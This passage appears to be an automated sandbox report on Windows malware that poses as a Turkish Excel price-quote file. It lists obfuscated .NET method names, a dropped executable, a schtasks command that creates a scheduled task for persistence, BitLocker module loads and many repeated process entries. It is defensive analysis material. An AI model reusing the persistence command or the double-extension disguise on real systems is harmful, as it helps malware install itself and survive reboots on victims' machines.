Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zCNwJdFnQu4puUFchct.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, n6TEH8zCDlVl4HvvYO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rC3oiK5rTtspMSI9J1.cs High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, kG4rDQDRSR9x8fka51.cs High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zOP9a9BGA3on5uXvvo.cs High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, oGQm8v3wF9JwNXXwVH.cs High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, nUhYvTMom9nagO8Sow.cs High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, fb6yvpsy14g5qhnfk0.cs High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rtPNF2YwxlfdEVDxrl.cs High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, W5VmDo6HmpAgbNZEiu.cs High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, mJTKhIVc7qJwtjTabI.cs High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.cs High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, NfalMhJ8uA3kaHXvgn.cs High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, IjoMYfSa29sGRgq0j8.cs High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, x64ZxoKhudRg3sF6Kl.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, lq3FlorROTtpd8nMyY.cs High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, j7LYTtwUmq2kSe3mU3.cs High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, ns7of4m4T22kQcU5Nm.cs High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, jO0gAth6LXQ4IqyJvc.cs High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zCNwJdFnQu4puUFchct.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, n6TEH8zCDlVl4HvvYO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rC3oiK5rTtspMSI9J1.cs High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, kG4rDQDRSR9x8fka51.cs High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zOP9a9BGA3on5uXvvo.cs High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, oGQm8v3wF9JwNXXwVH.cs High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, nUhYvTMom9nagO8Sow.cs High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
Drops PE files
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
